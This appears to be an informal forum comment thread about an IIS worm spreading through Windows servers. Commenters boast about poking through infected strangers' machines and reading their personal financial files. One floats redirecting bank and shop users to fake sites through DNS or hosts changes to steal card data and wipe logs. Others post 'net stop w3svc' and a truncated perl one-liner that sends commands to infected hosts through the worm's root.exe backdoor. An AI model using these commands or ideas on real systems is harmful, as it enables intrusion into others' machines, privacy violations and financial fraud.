Someone explain this to me.
Apache Blvd, ok, I get it now... it's the heat, really...
I'd like to add to that... "net send 127.0.0.1 Your system has been compromised. Please install Linux (or BSD or whatever) to correct."
You mean RH 6.2. My RH 7.0 box is still running 24/7 unpatched, because the only things listening by default are apache and identd.
I trust apache, and I find it difficult to believe someone could fuck up identd.
I haven't seen a post on this and I hope I don't spark the idea, but I think a bigger threat, other than being an individual target of 100,000 UDP packets, is running a broadcast ping from these machines. Talk about generating a lot of network traffic. For those who are trying to slow the spread of this problem by 'fixing' remote machines, you might want to rename ping.exe to something else just so it's not used, since the machine is broken anyway....
- Posted anonymously so I don't get accused of 'encouraging' anything. Not that I'd be found guilty, I just can't afford the court fees.
The funny thing is, it would be illegal to help in this way.
Fuck the system? Nah, you might catch something.
I've spent the last few hours being nosy as the worm spreads through 64.111.*.*. The backdoor appears to not be a rootkit, exactly, as I've encountered 'Access Denied' messages while poking around in people's files. Maybe the worm just runs with the Web server's permissions. Don't know much about NT.
I see a lot of evidence that nobody is really maintaining these boxes. They're littered with FOUND.nnn directories and questionable software. I saw installations of AOL 4.0 (!), 6.0, ICQ and Instant Messenger, and games like HL: Opposing Force on lots of corporate servers. It looks like a lot of these servers are also people's personal workstations; I found the details of some poor bastard's order from nike.com, along with other personal financial files. They're lucky I'm just a bored wanna-be hacker instead of some luser cracker who gets off on messing up other people's boxen.
Does this exploit give enough rights to modify the hosts file or DNS configuration for DNS servers? Could you redirect users of some popular e-commerce and/or banking sites to fake sites? Bit of trouble, but might get lots of credit card information etc. Hell, you could even run fake sites off other infected boxes, and if you have the rights, just wipe the logs yourself.
net stop w3svc stops their iis
batcomputer# fgrep 'default.ida?XXX'
perl -ne 'use LWP::Simple; chomp; get("http://$_/scripts/root.exe?/c+start+http://w
Oops, typo, I mean
batcomputer# fgrep 'default.ida?XXX'
perl -ne 'use LWP::Simple; chomp; get("http://$_/scripts/root.exe?/c+start+http://w